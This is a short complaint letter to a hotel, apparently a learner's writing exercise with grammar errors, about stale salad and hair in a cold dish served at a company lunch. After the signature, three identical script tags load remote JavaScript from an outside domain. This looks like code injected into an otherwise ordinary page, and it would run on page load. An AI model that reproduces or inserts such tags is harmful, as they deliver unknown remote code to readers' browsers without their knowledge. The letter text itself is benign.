Dear Sir or Madam,
I am writing to express my concern regarding to the lunch you served us yesterday. While first of all, thank you for your meeting service which was considerate and professional.
My company hold a day of meeting in your main hall. Most people attending the our conference found the place we met was the best one among the meeting we held previously. Besides your service, the simple but comfortable trending stlye in the meeting room left a great impression on them.
However, I kindly propose that if the food serving could be improved, your hotel will be more attract more customers. During the lunch yesterday, some of us found the salad was not fresh, the sauce had been put outside for a while which smelt unpleasant. Moreover, I found human hair in the cold dish. I told the waiters to change them, your kitchen responsed in time.
Thank you for reading my suggestion, I hope we can cooperate more in the future if you can improve your food quality, which will be a double win for both of us.
Yours faithfully,
Tony<script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script>
